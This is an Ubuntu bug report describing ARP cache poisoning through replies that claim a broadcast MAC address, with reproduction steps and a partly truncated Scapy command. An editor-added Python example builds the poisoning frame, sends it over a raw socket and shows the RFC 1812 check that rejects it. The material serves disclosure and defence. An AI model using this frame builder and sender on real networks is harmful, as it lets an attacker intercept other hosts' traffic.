arp cache updated by replies with broadcast address
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
linux (Ubuntu) | Invalid | Medium | Unassigned |
Bug Description
Binary package hint: linux-image-generic
The Linux kernel is accepting ARP replies with entries that point to a broadcast Ethernet address, poisoning the ARP cache.
The steps to reproduce this include sending an unsolicited ARP reply to the given host where the hwsrc field is filled with ff:ff:ff:ff:ff:ff and the psrc field contains an IP address that already existed in the ARP cache of the victim (let's say 192.168.0.1).
The consequence of this is that the kernel will update the ARP cache with an entry like: 192.168.0.1 at FF:FF:FF:FF:FF:FF, and will send all packets directed to 192.168.0.1 to the broadcast destination. This will allow attackers to easily sniff all the traffic destined to the host 192.168.0.1 coming from the compromised machine.
Scapy can be used to create such a packet with the command: pack = Ether(dst=
This must then be sent, at regular intervals, with the command sendp(pack).
If this behavior is also present in the linux-image-server kernel this might be a bigger problem. In server environments, where Linux may be used as a router, this behavior goes against RFC 1812, which states:
"3.3.2 Address Resolution Protocol - ARP
(...)
A router MUST not believe any ARP reply that claims that the Link Layer address of another host or router is a broadcast or multicast address."
Tests performed on Kubuntu 7.10, command line only installation, kernel 2.6.22-14-generic.
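The following is an added example written for this page by the editor, not code from the bug reporter or from the kernel. It builds the same unsolicited ARP reply the report describes (hwsrc = ff:ff:ff:ff:ff:ff, psrc = an IP already in the victim's cache) as raw wire bytes, without Scapy, and then shows the RFC 1812 check a router should apply: reject any ARP reply whose sender hardware address is broadcast or multicast (group bit set in the first octet). The cache model is a deliberate simplification (a dict of IP to MAC, where unsolicited replies only overwrite entries that already exist); the MAC and IP addresses, the `rfc1812` flag and the `send_raw` helper are assumptions for illustration, not kernel interfaces.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{octet:02x}" for octet in raw)


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(octet) for octet in raw)


def build_arp_reply(hwsrc: str, psrc: str, hwdst: str, pdst: str) -> bytes:
    """Ethernet frame (14 bytes) + ARP reply (28 bytes) for IPv4 over Ethernet.

    Layout matches what Scapy's Ether()/ARP(op=2) would emit on the wire."""
    eth = mac_to_bytes(hwdst) + mac_to_bytes(hwsrc) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype, ptype, hlen, plen, op
    arp += mac_to_bytes(hwsrc) + ip_to_bytes(psrc) + mac_to_bytes(hwdst) + ip_to_bytes(pdst)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into its fields; raises on anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": op,
        "hwsrc": bytes_to_mac(frame[22:28]),
        "psrc": bytes_to_ip(frame[28:32]),
        "hwdst": bytes_to_mac(frame[32:38]),
        "pdst": bytes_to_ip(frame[38:42]),
    }


def is_broadcast_or_multicast(mac: str) -> bool:
    """RFC 1812 3.3.2: a link-layer address with the group (I/G) bit set is
    multicast; ff:ff:ff:ff:ff:ff is the broadcast case of the same rule."""
    return bool(mac_to_bytes(mac)[0] & 0x01)


def update_cache(cache: dict, frame: bytes, rfc1812: bool = True) -> bool:
    """Apply an ARP reply to a simplified IP->MAC cache.

    rfc1812=False reproduces the behaviour the report describes (assumed model):
    an unsolicited reply overwrites an existing entry with whatever hwsrc says.
    rfc1812=True refuses replies that claim a broadcast/multicast address."""
    arp = parse_arp(frame)
    if arp["op"] != ARP_REPLY:
        return False
    if arp["psrc"] not in cache:      # unsolicited reply for an unknown host: ignored
        return False
    if rfc1812 and is_broadcast_or_multicast(arp["hwsrc"]):
        return False                  # MUST NOT believe this reply
    cache[arp["psrc"]] = arp["hwsrc"]
    return True


def send_raw(frame: bytes, iface: str) -> None:
    """Send a prebuilt frame with a Linux AF_PACKET raw socket (needs CAP_NET_RAW).
    Equivalent to the reporter's sendp(pack); loop it to keep the entry poisoned."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as sock:
        sock.bind((iface, 0))
        sock.send(frame)


if __name__ == "__main__":
    # Constructed sample: victim already knows the gateway 192.168.0.1.
    victim_cache = {"192.168.0.1": "00:11:22:33:44:55"}
    poison = build_arp_reply(BROADCAST_MAC, "192.168.0.1", "00:aa:bb:cc:dd:ee", "192.168.0.50")
    vulnerable = dict(victim_cache)
    update_cache(vulnerable, poison, rfc1812=False)
    print("vulnerable cache:", vulnerable)   # 192.168.0.1 -> ff:ff:ff:ff:ff:ff
    hardened = dict(victim_cache)
    print("accepted by RFC 1812 check:", update_cache(hardened, poison), hardened)
```

The group-bit test is deliberately broader than an equality check against ff:ff:ff:ff:ff:ff: a reply claiming 01:00:5e:xx:xx:xx (an IPv4 multicast MAC) would poison the cache in exactly the same way, and RFC 1812 forbids believing that too.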
Changed in linux-meta:
status: New → Confirmed
Changed in linux:
importance: Undecided → Medium
This bug report was marked as Confirmed a while ago but has not had any updated comments for quite some time. Please let us know if this issue remains in the current Ubuntu release, http://www.ubuntu.com/getubuntu/download . If the issue remains, click on the current status under the Status column and change the status back to "New". Thanks.
[This is an automated message. Apologies if it has reached you inappropriately; please just reply to this message indicating so.]